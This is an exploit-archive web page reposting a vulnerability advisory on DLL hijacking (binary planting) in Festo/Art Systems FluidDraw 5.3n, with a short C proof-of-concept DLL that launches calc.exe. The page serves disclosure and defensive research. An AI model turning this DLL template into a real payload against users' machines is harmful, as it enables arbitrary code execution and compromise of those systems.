首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2016-01-20  
/*


Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution


Vendor: Art Systems Software GmbH | Festo AG & Co. KG
Product web page: http://www.art-systems.com | https://www.festo.com
Affected version: FluidDraw S5 Starter 5.3n (5.3.385.0)
                  FluidDraw P5 Professional 5.3n (5.3.385.0)

Summary: Fluiddraw enables the creation of electrical and pneumatic
circuit diagrams. The tool makes it easier to plan complete systems
and implement individual components. Users access the Festo catalogue
and their own imported databases and can thus benefit from evaluation
functions and created assembly drawings. The software is part of Festo
Engineering Tools, which provides users with electronic and continuous
support in the entire process, from planning, selection, design and
ordering up to delivery and commissioning.

Desc: FluidDraw suffers from a DLL Hijacking issue. The vulnerability
is caused due to the application loading libraries (siappdll.dll) in
an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application files (.PRJ, .CIRC,
.CT, .DXF, .SYM) located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5295
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5295.php


01.12.2015

*/


// gcc -shared -o siappdll.dll exploit.c

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{ 
	exec();
	return 0;
}

int exec()
{
	WinExec( "calc.exe" , SW_NORMAL );
	return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel REFCOUNT Overflow
·BlueControl 3.5 SR5 Insecure L
·NetSchedScan 1.0 - Crash PoC
·Java Platform SE 6 U24 HtmlCon
·Amanda <= 3.3.1 - amstar Comma
·xWPE 1.5.30a-2.1 - Local Buffe
·SevOne NMS <= 5.3.6.0 - Remote
·WhatsUp Gold 16.3 - Unauthenti
·Android ADB Debug Server Remot
·Konica Minolta FTP Utility 1.0
·FreeBSD SCTP ICMPv6 Error Proc
·SNScan 1.05 - Scan Hostname/IP
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved